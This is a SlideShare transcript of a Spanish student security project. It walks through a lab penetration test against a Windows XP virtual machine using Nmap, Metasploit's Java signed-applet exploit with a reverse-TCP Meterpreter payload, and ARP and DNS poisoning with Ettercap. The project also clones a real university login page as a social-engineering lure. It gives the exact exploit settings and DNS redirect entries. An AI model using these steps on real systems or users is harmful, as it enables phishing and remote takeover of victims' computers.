Your SlideShare is downloading. ×
Episodio de pentesting
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Introducing the official SlideShare app

Stunning, full-screen experience for iPhone and Android

Text the download link to your phone

Standard text messaging rates apply

Episodio de pentesting

423
views

Published on

Published in: Technology

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
423
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
39
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Episodio de Pentesting Hello world, I’m backtrackNicolás Moral de AguilarSeguridad en tecnologías de la información
  • 2. Índice1. Planteamiento del episodio2. Conceptos necesarios3. Configuración del escenario4. Escaneo a la víctima5. Elección de vulnerabilidad6. Configuración del exploit7. Envenenamiento DNS8. Ingeniería social9. Meterpreter en acción Anexos 2
  • 3. 1. Presentación del episodioEn el episodio de penetración que se expone a lo largo de este proyecto, se realizará unaexplicación detallada de cómo conseguir hacerse con un ordenador remoto aprovechando unavulnerabilidad de Java en navegadores, que permite la ejecución de código malicioso tras aceptarun applet de Java en cualquier navegador y/o sistema operativo. Así mismo, explicaré elprocedimiento habitual en el que entra en juego la ingeniería social para hacer que las posiblesvíctimas acepten la ejecución del applet.Para explicar el procedimiento, voy a especificar varias fases por separado, que permitirán entenderde manera más sencilla todo el proceso. En la primera fase, se debe realizar un escaneo de la LANen la que se sitúa el episodio para visualizar la estructura de la red y detectar posibles equiposvulnerables. Más tarde, hay que analizar los mismos para ver cómo y qué vulnerabilidades sepueden aprovechar. Tras eso, se debe configurar el exploit necesario para aprovechar dichavulnerabilidad, y dependiendo del tipo de exploit, habrá que seguir un procedimiento para hacerque el ataque se haga efectivo. 3
  • 4. 2. Conceptos necesariosPara la compresión de este proyecto necesitaremos tener algunas definiciones y conceptos claros,así que voy a dar una breve explicación de todos los términos que considero necesarios paraentender el desarrollo del mismo.Backtrack 5 R3Distribución de Linux basada en Ubuntu destinada a la seguridad. En su última versión incorpora lasversiones actualizadas de muchas de las utilidades de Linux más usadas en el ámbito de laseguridad informática. Abarca desde programas destinados al pentesting, como MetasploitFramework o SET, pasando por herramientas de ingeniería inversa, como IDA Pro, de análisis deredes, como Nmap o AirCrack, o de análisis forense, como Galleta. La distribución se basa másconcretamente en Ubuntu 10.04 LTS (Lucid Lynx) y está disponible en arquitecturas de 32, 64 bits yen ARM. En el ámbito de la seguridad, posiblemente sea la distribución más utilizada. Como datoadicional, en todo el desarrollo del episodio os llamará la atención la ausencia de “sudo” en loscomandos, pero la razón es que este sistema utiliza la cuenta de administrador por defecto. En eldesarrollo del episodio, me referiré a esto como Backtrack, BT o BT5.Metasploit FrameworkEs una herramienta imprescindible para cualquier informático que trabaje con test de penetración.Metasploit o MSF, es un programa que recopila una base de datos de exploits autoactualizable quepermite aprovechar las posibles vulnerabilidades que tengan los equipos atacados. Junto conNMap, se convierte en una herramienta increíble. Además, existe una interfaz gráfica disponiblepara los que odien la CLI (Command Line Interface), llamada Armitage, de la que hablaré en uno delos anexos del proyecto.EttercapRealiza las funciones de sniffer, interceptor y registrador para cualquier LAN. Soporta direccionesactivas y pasivas de varios protocolos, incluido SSH y HTTPS. Hace posible la inyección de datos enuna conexión establecida y permite el filtrado al vuelo aun manteniendo la conexión sincronizadagracias a la característica de realizar ataques MiTM (Man in the middle). Justamente esta últimacaracterística es la que a nosotros nos interesa para nuestra simulación de escenario. Loexplicaremos de forma más extensa en el apartado de Envenenamiento de DNSVB Bridged Network ModeVirtualBox dispone de varios modos de configuración de la tarjeta de red virtualizada de las guest.Los más usados suelen ser el modo NAT, que crea un puente de conexión entre el host, con IPhabitualmente de tipo 192.168.X.X y el guest, el cual se configura en otra red 10.X.X.X. Y también seusa habitualmente el modo red interna, que conecta directamente todas las guest en una mismared. Sin embargo, puesto que el escenario precisa de actualización de diversos componentes dentrode la VM, he configurado la red como Bridged Network (Red Puenteada) que añade ambas VM a lared local y les asigna, como es evidente, direcciones del tipo 192.168.X.X. Ello nos permitirá tener 4
  • 5. ambas máquinas virtuales conectadas, tanto la atacante como la atacada, y además tener en ambasconexión a internet para actualizar los componentes necesarios.SETSocial Engineering Toolkit es una suite en CLI que nos facilita una interfaz en consola paraautomatizar el uso de ataques de penetración habituales compenetrando varias herramientas de ladistribución, como pueden ser Metasploit, NMap, Apache Server, etc… implementando en unamisma aplicación la automatización de los ataques. Le echaremos un vistazo en el apartado deanexos.PAYLOADEs un término que se refiere al código o herramienta que tras la infección de una víctima, permiterealizar todo tipo de efectos secundarios. Es decir, la parte del troyano que se encarga de loscambios de configuración, y ejecución de cualquier orden no legítima.EXPLOITEs un software, o secuencia de comandos que se crea con el fin de causar un error o un fallo enalguna aplicación, a fin de causar un comportamiento no deseado o imprevisto en un sistema ocomponente. Habitualmente supone la ejecución remota de código, la escalada de privilegios oincluso un ataque DOS. 5
  • 6. 3. Configuración del escenarioPara poner en marcha un escenario de una simulación de un ataque de penetración o pentesting,vamos a utilizar dos máquinas virtuales interconectadas, las cuales vamos a configurar de la maneraapropiada para que el ataque pueda llevarse a cabo de manera exitosa. Tras instalar VirtualBox,vamos a necesitar una ISO de Windows XP SP3 y otra de Backtrack 5 R3 para instalar cada una enuna VM distinta.(Proceso de instalación de las dos VM)Evidentemente, podemos usar versiones diferentes de ambos SO, pero en este caso he escogido lasversiones más actualizadas de ambos. A continuación voy a mostrar la configuración que hedispuesto en cada una de los sistemas invitados.Backtrack 5 R3, está instalado en un disco duro virtual y se le han asignado 512Mb de RAM. Inclusoes suficiente con bastante menos memoria puesto que el ataque que vamos a realizar no necesitatener demasiados programas en memoria. En el momento de más carga, deberían estar un servidorApache, MSF y Ettercap. El sistema está actualizado con la siguiente lista de órdenes:“apt-get update && apt-get upgrade”“msfupdate”Además, tiene actualizado SET a la última versión desde su propio menú de opciones.La máquina virtual está configurada como Bridged Network por lo que se adhiere a la LAN a la quepertenece el sistema host, con una IP del tipo 192.168.1.XWindows XP SP3 contiene las últimas actualizaciones de Windows Update y está configuradotambién como Bridged Network, por lo que tiene otra IP perteneciente a la red local del host.Además está instalado Google Chrome por si necesito hacer alguna búsqueda durante el desarrollo 6
  • 7. del proyecto, y de paso para demostrar que independientemente del navegador instalado, elsistema sigue siendo vulnerable, ya que la vulnerabilidad está en el JRE.(Configuración de red de ambas VM)Con ambas máquinas virtuales funcionando y actualizadas correctamente, estamos listos paraentrar en materia e iniciar nuestro MSF. Como recomendación adicional, propongo hacer unaSnapshot de ambas máquinas virtuales. No es estrictamente necesario ya que no vamos a tocarnada relacionado con el kernel ni con el boot de BT5, y evidentemente Windows ya viene biencapado de serie, pero es recomendable por si a alguien se le va la mano con la consola deMeterpreter y teclea un “rm –r *.*”.Hasta nueva orden, la parte que viene a continuación se desarrolla de forma íntegra en la VM deBT5, por lo que supongo la ejecución de órdenes con “sudo” y que todas ellas se ejecutan en BT. 7
  • 8. 4. Escaneo a la víctimaLo primero que necesitamos para poder hacer uso de nuestro supuesto exploit, y tras instalar lasherramientas necesarias en nuestra máquina, es seleccionar una o varias víctimas en las que tratarde hacer efectivo el ataque. Para ello, y con el fin de escanear las posibles vulnerabilidades queexpongan a las víctimas ante nuestro ataque, necesitamos información sobre las direcciones a lasque vamos a atacar. Para ello, lo primero es ejecutar un análisis de puertos. Y a estas alturas estaréispensando en Nmap, la cual evidentemente podemos utilizar. Así que sería bastante fácil ponernosmanos a la obra y ejecutar un escaneo generalizado con Nmap, del cual pondré un ejemplosimplemente por lo que explicaré a continuación.Escaneo vía NmapEjecutamos en terminal la siguiente orden:“nmap –A 192.168.1.26”(Orden ejecutada en BT5)La orden anterior básicamente realiza un scan rápido a la IP que especificamos, en este caso192.168.1.26, y añade un scan de SO con el atributo –A. Habitualmente se usa también –v paravisualizar más información del proceso, pero puesto que es un ejemplo la he omitido. 8
  • 9. Escanear una red mediante Nmap es una forma totalmente válida para lo que necesitamos en esteproceso, incluso podríamos utilizar Zenmap que es la GUI de Nmap, pero para que se observe elpotencial de Metasploit, vamos a realizar el scan directamente desde el propio MSF, ya que incluyemódulos de escaneo. Por tanto, iniciamos directamente la consola de Metasploit con“msfconsole” y vemos que escaneos tenemos disponibles para realizar con los siguientescomandos mostrados en la imagen siguiente. Los escaneos más habituales son el TCP y el SYN, perocomo de momento solo necesito averiguar cuál es la versión del SO, me vale cualquiera.(Ejecutando SYN scan)He configurado el RHOST con la dirección del equipo atacado porque en este caso la sabemos. Perosi quisiéramos escanear una red, normalmente se realiza un scan a los equipos limitados por lamáscara de subred 255.255.255.0, es decir, desde 192.168.1.0 hasta 192.168.1.255. Se especificade la siguiente manera “set RHOSTS 192.168.1.0/24”.Escaneamos el puerto 445 que viene abierto por defecto en todos los Windows ya que es utilizadopor SMB (Server Message Block, sistema para compartir archivos e impresoras de Microsoft) y quenos servirá para saber la versión del sistema operativo. Observamos que está abierto, por lo quebuscamos algún scan para SMB. 9
  • 10. (Ejecutando SMB scan)Una vez que sabemos el sistema operativo que ejecuta el sistema en cuestión y hemos obtenido lainformación adicional de puertos, debemos pasar a la elaboración del plan de ataque, empezandopor la elección de la vulnerabilidad que vamos a utilizar. 10
  • 11. 5. Elección de vulnerabilidadGracias a MSF y su gigantesca base de datos de exploits funcionales, tenemos miles deposibilidades para hacernos con un ordenador remoto. El momento de elegir que vulnerabilidadvamos a aprovechar es importante, ya que marcará el rumbo del proceso para hacernos con lamáquina remota. En este caso, uno de los puntos más importantes, es que la elección del exploitdebe realizarse pensando en el sistema operativo de la víctima, y en los servicios que operan pordefecto en los puertos que hayamos detectado abiertos. Por tanto, podríamos elegirvulnerabilidades de diferentes clases.Para Windows XP destacar el exploit “ms08_067_netapi” que ha sido uno de los más utilizadosdurante la vida de XP, ya que permite su ejecución sin intervención alguna del usuario remoto, porlo que evita la ingeniería social. El exploit aprovecha las vulnerabilidades CVE-2006-4446 y CVE-2006-4777 y permite la apertura incluso de una sesión de meterpreter, y la escalada de privilegiosen el sistema.Sin embargo, debido a su compatibilidad con diferentes navegadores y sistemas operativos, en esteescenario voy a utilizar la que posiblemente sea la vulnerabilidad más utilizada de MSF,“Java_signed_applet”. El exploit se inyecta en el servidor http del atacante, junto con los payloadsgenerados para los diferentes sistemas operativos, y permite la ejecución de una sesión demeterpreter, cuyas virtudes estudiaremos más adelante, en la victima.El exploit Java signed applet nos permite crear un complemento envenenado de java para elnavegador, que puede incluso firmarse si tenemos el JDK (Java Development Kit) instalado en la VM.Este complemento se inyecta en el servidor web independientemente de la página web que hayacreada, lo cual es bastante interesante y aumenta con creces la maniobrabilidad de la ingenieríasocial. Una vez hemos aceptado su ejecución, el payload entrará en la VM víctima y se ejecutará,creando una conexión “reverse-tcp” que se comunicará directamente con metasploit. 11
  • 12. 6. Configuración del exploitLo primero que debemos hacer es llamar al exploit, pero si no nos sabemos la ruta exacta podemosutilizar la función search de Metasploit. Se ve mejor en esta imagen:(Configuración básica de Metasploit)En la imagen de arriba podemos observar que si hacemos un “show options”, se nos muestranlos parámetros de configuración modificables para el exploit, y su configuración por defecto. Al ladode cada parámetro viene una breve descripción del mismo, por lo que no me voy a extenderdemasiado. Pero es importante echar un vistazo a SRVHOST, SRVPORT, LHOST y para este exploit enconcreto, podemos configurar el nombre del applet malicioso modificando APPLETNAME, e inclusola firma del applet con CERTN. Los parámetros se modifican como en el siguiente ejemplo:“set APPLETNAME EXPLOIT”.A continuación, la parte más importante de la configuración de un exploit consiste en la eleccióndel Payload, pues será el programa que se encargará de realizar la conexión inversa desde la víctimahasta el host. En este caso, vamos a utilizar el payload más famoso de Metasploit que se llamaMeterpreter, y para ser más exactos, en su versión de puertos TCP. Dicho esto, el paso siguiente essetearlo en nuestro exploit, dando la siguiente instrucción: 12
  • 13. “set PAYLOAD windows/meterpreter/reverse_tcp”Una vez configurado completamente el exploit con las opciones que necesitemos escribimos en laconsola de MSF “exploit” y automáticamente MSF montará el servidor web con el contenidoinfectado. De forma predeterminada, MSF monta la inyección del exploit en una URL aleatoria deltipo http://127.0.0.1/XXXXXXX pero si queremos especificar un nombre en la dirección tendremosque configurar URIPATH en la configuración del exploit.Ahora solo deberemos hacer que la víctima entre en el enlace y permita la instalación delcomplemento de Java. Para ello podríamos hacer uso de ingeniería inversa, a través de un mail o decualquier otro servicio, pero puesto que suponemos que la víctima está en la misma red local,vamos a usar DNS Poisoning, lo que explicaremos a continuación. 13
  • 14. 7. Envenenamiento DNSA grandes rasgos un envenenamiento DNS, más conocido por su traducción en inglés DNSPoissoning, es una forma de ataque MiTM en el que el atacante hará que el PC atacado resuelva lasdirecciones con un servidor de DNS “alterado”. Esto puede parecer un poco complejo al principio,pero vamos a explicarlo de forma más detallada.Primero introduciremos un nuevo concepto que no se definió en el tutorial porque consideré queera más conveniente verlo justo en el momento de su necesidad. Así que a continuación seexplicará que es el Protocolo ARP (Adress Resolution Protocol) y el envenenamiento de su cache.Básicamente es un protocolo responsable de encontrar la dirección MAC correspondiente a unadeterminada IP. Imaginemos ordenador A y ordenador B.ARP Request: El ordenador A pregunta en la red a quién pertenece una determinada IP, pongamos192.168.1.1.ARP Reply: Todos los demás ordenadores de la red ignorarán la petición a excepción del que tengaesa dirección IP. Este ordenador contestará con un paquete que contendrá la IP requerida y sudirección MAC.El protocolo fue diseñado para ser simple y eficiente pero su mayor defecto es la ausencia deautenticación. Como resultado, no hay manera de autenticar la IP con la dirección MAC contenidaen el ARP Reply. Además, el host ni siquiera comprueba si fue enviada la respuesta ARP desde lamisma IP que se solicitó en la petición.Esto quiere decir que si un ordenador A, envía una petición y recibe una respuesta ARP, el protocolono puede comprobar si la IP corresponde con su MAC. Incluso si un host no envió una petición ARPpero si recibe una respuesta ARP, confía en la información de respuesta y actualiza su cache ARP.Por tanto, como podemos observar parece fácil explotar el débil protocolo ARP. Es posible enviar ala red entera una respuesta ARP en la que cualquier IP está mapeada a cualquier MAC.La vulnerabilidad anterior permite el ataque a una LAN de varias formas, en este caso, y como yahemos indicado anteriormente utilizaremos la técnica Man in the Middle, que nos permitirá hacersniff a todo el tráfico entre dos PC de la red.Para conseguir esto, supongamos que mi PC es el host A, y mi router es el host B. Mi ordenadortiene una IP-A y una MAC-A, y el router una IP-B y una MAC-B.La máquina C, o sea, la que realizará el ataque, envía una respuesta ARP a B que mapea IP-A conMAC-C, y otra respuesta ARP hacia A que mapea IP-B con MAC-C. Por tanto ahora cualquierpaquete enviado desde A a B o desde B a A, llegará a C. Entonces es momento de activar en C, IPforwarding (Redireccionamiento IP), que permite redireccionar A a B. Es este momento cuando C seencuentra justo en medio de la conexión entre A y B, y tenemos un ataque Man in the Middle entoda regla.Toda esta teoría es imprescindible, pero creo que es hora de pasar a la práctica. 14
  • 15. Os presento a Ettercap, que nos permitirá poner en práctica este ataque. En esta ocasión vamos autilizar la interfaz gráfica por su comodidad, ya que es un rollazo aprenderse la ingente cantidad decomandos que tiene la CLI, y no es cómodo para trabajar. En caso de no querer iniciar Xorg,podemos usar Ettercap –C, que funciona con una interfaz creada con curses. Así que iniciamosEttercap introduciendo en la terminal “ettercap -G”.A continuación hacemos click en “Sniff -> Unified Sniffing” y se nos abrirá una ventana de selecciónen la que podremos escoger cualquiera de las interfaces disponibles. Como estoy trabajando en VB,elijo eth0.(Ettercap en modo Unified Sniffing)Ahora vamos a escanear la red para ver los equipos, por lo que hacemos click en “Hosts -> Scan forhost”. Y cuando esté completado en “Hosts -> Host List”. Ahora vemos información interesante, queson todos los host de la red listados con direcciones MAC correspondientes. Nos disponemos ahacer un ataque MiTM, por tanto seleccionamos un host y pulsamos en “Add to Target 1” yhacemos lo mismo con el otro host que queramos interceptar pero esta vez lo añadimos en “Add toTarget 2”. 15
  • 16. (Seleccionando objetivos en Ettercap)Ahora seleccionamos “Mitm -> Arp Poisoning” y marcamos la opción de Sniff Remote Connection.Una vez hecho esto iniciamos el Sniff desde “Start -> Start Sniffing”Una vez que los paquetes están pasando por nuestro PC, lo que necesitamos es direccionar a lavíctima a la dirección IP en la que hemos inyectado el exploit, para ello lo que vamos a hacer esredireccionar el DNS usando un plugin de Ettercap que se llama dns-spoof. Pero antes debemoseditar el archivo de configuración que Ettercap dedica al dns. Si estáis habituados al archivo deLinux hosts (/etc/hosts) veréis que la configuración se hace del mismo modo, así que desde unaterminal nos vamos a editar el archivo de configuración de DNS de Ettercap.“nano /usr/local/share/ettercap/etter.dns”Aquí añadimos las líneas que queramos para redireccionar cualquier dirección a nuestra IP. Yo hepuesto la dirección de la UJA añadiendo esto:*.ujaen.es A 192.168.1.27ujaen.es A 192.168.1.27 16
  • 17. Una vez hemos hecho eso, solo queda activar el plugin, y todo estará listo, como podemos ver en lasiguiente imagen en la que se ve como haciendo un ping y entrando directamente en la web, nosredirecciona correctamente a nuestro servidor malicioso. 17
  • 18. 8. Ingeniería socialDurante el desarrollo del proyecto me estuve planteando la posibilidad de omitir este apartado. Sinembargo después de no pocas reflexiones, creo que a nivel de poner en práctica este episodio en elmundo real, esta es la parte más importante. Se debe hacer caer a la víctima en la trampa, y una delas maneras más eficientes es suplantando la identidad de un sitio web habitual de tal manera queel usuario no se dé cuenta de la trampa. Creo que estamos de acuerdo en que un index.html deltipo <h1>HOLA, SI ACEPTAS ESTE APPLET VOY A HACKEARTE EL PC</h1> no es demasiadoútil.Pero… ¿Y si clonamos la web de Google? Pensé en clonar la UJA, pero la verdad es que ocupademasiado y tardaríamos en descargar el árbol de direcciones bastante rato. Al final, decidíinyectarlo en un sitio más creíble, ya que a día de hoy es improbable que Google inserte un appletde Java en su buscador y me decidí por inyectarlo justo en el enlace de autenticación dedv.ujaen.es, cambiando el link en el código fuente hacia mi IP.Me pongo manos a la obra, y aunque podría descargarme el código directamente con wget o conun right click en la misma web, o incluso copiando directamente el código fuente visible, eso es unachapuza a no ser que nos queramos pasar un par de horas redireccionando hojas de estilo ycontenido multimedia.Descargamos un programa que se encarga de hacer la tarea por nosotros, httrack.“apt-get install httrack”Nos situamos en la carpeta que queramos descargar la web, y ejecutamos el programa pasandocomo argumento la web que deseemos.“httrack dv.ujaen.es”(httrack clonando www.google.es) 18
  • 19. Una vez copiada la web en la carpeta que hayamos definido por defecto (recomiendo que no seadirectamente el servidor por si hay algún fallo) comprobamos que está bien en el navegador, y lacopiamos directamente a la carpeta del servidor apache, ya sea únicamente el index o tambiénarchivos y carpetas asociados.“cp dv.ujaen.es/* /var/www”Una vez lo hemos copiado iniciamos el servidor apache desde el menú.Applications -> Backtrack -> Services -> HTTPD -> apache startBásicamente ya está todo copiado y listo para funcionar. Os adjunto como información adicional losparámetros exactos que yo he utilizado para configurar el exploit y el payload en MSF.set APPLETNAME UJA_AUTHset CERTCN Ujaenset URIPATH /authappletset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.1.XXX(Hay que tener cuidado de no establecer como Puerto del servidor el 80, ya que lo estamosutilizando para alojar a la web clonada) 19
  • 20. 9. Meterpreter en acciónExploit inyectado en la web esperamos pacientemente que nuestra ingeniería social haga acto depresencia ante la víctima y esta ejecute el complemento de Java. Una vez ejecutado, el applet seencargará de realizar automáticamente una conexión inversa hacia nuestro servidor por el puertoque hayamos especificado en LPORT y abrirá una sesión de Meterpreter para dejarnos enordenador atacado a nuestra disposición.Metasploit por defecto no nos redirige a la sesión abierta directamente, tendremos que abrirlanosotros, así que vemos los comandos por defecto.Primero, ejecutamos “sessions –l” y nos listará todas las sesiones que hayan activado nuestrostroyanos de conexión inversa. Para seleccionar una simplemente tenemos que escribir:(Exploit activando sesión y abriéndola en meterpreter)“sessions –i id” es decir…“sessions –i 1”Se nos abrirá una session de Meterpreter, y lo primero que tenemos que hacer tras examiner unpoquito la CLI, es ejecutar una orden help, para ver qué podemos hacer con él. En este momento,los que no conozcan Meterpreter se darán cuenta de por qué he elegido este payload y no uno deShell normal. Meterpreter tiene muchísimas opciones con órdenes directas, desde subir odescargar un archivo, hasta terminar un proceso o capturar el micro o la webcam.El payload es verdaderamente una obra de arte, podría explicar uno por uno que hace cadacomando, pero puesto que viene una descripción del mismo en inglés creo que no tiene sentido yes mucho más divertido si lo investigas tú mismo. 20
  • 21. (Algunos comandos de Meterpreter) 21
  • 22. AnexosComo información complementaria al proyecto, pero relativa al mismo, voy a presentaros dosherramientas que os facilitarán el trabajo del día a día. Armitage y SET.ArmitageEsta herramienta básicamente se encarga de proveer de interfaz gráfica a MSF, pero sin dejar delado una línea de comandos. Armitage tiene una barra superior que automatiza el escaneo deredes, la búsqueda de ataques disponibles para las distintas posibles víctimas dependiendo de lainformación que consiga en los escaneos pertinentes. Además, te permite elegir los ataques y teofrece una configuración predeterminada para el mismo dependiendo del sistema operativo de lavíctima. Su parte inferior, es una consola en la que se van abriendo pestañas para lanzar losdiferentes procesos durante el ataque. En cierto modo, como toda interfaz gráfica, reduceconsiderablemente las posibilidades del programa comparado con su interfaz CLI, pero ya que lapropia interfaz dispone de una línea de comandos, podemos suplir las carencias de la interfaz desdeahí. La interfaz se lanza directamente desde el menú de backtrack.(Lanzando armitage desde el menú) 22
  • 23. (Ventana de metasploit habitual cuando se arranca)(Ventana con un ataque en proceso, en la que hay vulnerados 3 dispositivos de la red)Como podéis ver la interfaz es bastante útil, y además hace el ataque mucho más vistoso si lo quequeréis es hacer algún tipo de publicación o documento oficial. 23
  • 24. SETCuyo nombre completo es Social Engineering Toolkit es un conjunto de utilidades como su propionombre indica que nos asiste en la tarea de poner en funcionamiento todo tipo de ataques en losque interviene la ingeniería social, desde ataques vectoriales, hasta ataques como los de passharvesting o tabnabbing (El primero es captura de contraseñas envenenando una petición GET oPOST en nuestro servidor, y el segundo hace lo mismo pero carga el servidor malicioso al cambiarde pestaña en el navegador de la víctima). Creado por David Kennedy, la verdad es que se haconvertido en una herramienta indispensable para cualquiera que trabaje en el área de pentesting,llegando incluso a portarse a un dispositivo iOS con Jailbreak. El software integra en muchas de suspartes secciones del propio Metasploit, pero automatiza la tarea hasta tal punto de basarse en unmenú seleccionable con diferentes niveles. También viene incluido en la distribución de Backtrack.Os dejo algunas imágenes.(Menú principal de SET) 24
  • 25. (Menú de ataques principal SET) (Selección de Payload SET) 25